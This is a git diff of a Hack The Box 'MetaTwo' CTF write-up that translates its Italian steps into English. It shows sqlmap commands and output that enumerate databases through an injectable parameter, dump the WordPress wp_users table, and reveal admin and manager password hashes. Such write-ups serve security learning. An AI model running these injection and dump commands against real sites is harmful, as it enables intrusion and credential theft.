--- a/CTF-HackTheBox/Easy/MetaTwo/5. SqlMap.md
+++ b/CTF-HackTheBox/Easy/MetaTwo/5. SqlMap.md
@@ -1,4 +1,5 @@
-1) Cerchiamo quanti database ci stanno:
+1) Let's find out how many databases there are:
+```
 ┌──(kali㉿kali)-[~]
 └─$  sqlmap -r 'sql Inject.req'   -p total_service --dbs
 
@@ -58,9 +59,10 @@ back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
 available databases [2]:
 [*] blog
 [*] information_schema
+```
 
-
-2) Facciamo una scansione totale:
+2)Let's do a full scan:
+```
 ┌──(kali㉿kali)-[~]
 └─$ sqlmap  -r 'sql Inject.req' --batch --dbms mysql --threads 10 --dbs  --all    
         ___
@@ -190,9 +192,9 @@ current user is DBA: False
 [14:52:22] [INFO] fetching number of database users
 [14:52:22] [INFO] retrieved: 1
 [14:52:35] [INFO] retrieved: 
-
-3) Analizziamo il database "blog":
-
+```
+3)We analyze the database "blog":
+```
 ┌──(kali㉿kali)-[~]
 └─$ sqlmap -r 'sql Inject.req'  -p total_service -D blog --tables 
         ___
@@ -245,12 +247,13 @@ do you want sqlmap to try to optimize value(s) for DBMS delay responses (option 
 Database: blog
 +--------------------------------------------+
 | wp_users                                                   |
+```
 
-
-4) Analizziamo la tabella wp_users:
+4) We analyze the table wp_users:
+```
 sqlmap -r 'sql Inject.req'  -D blog -T wp_users --dump
-
-5) Trovo due account:
+```
+5) I find two account:
 ```
 admin:$P$BGrGrgf2wToBS79i07Rk9sN4Fzk.TV.
 manager:$P$B4aNM28N0E.tMy/JIcnVMZbGcU16Q70
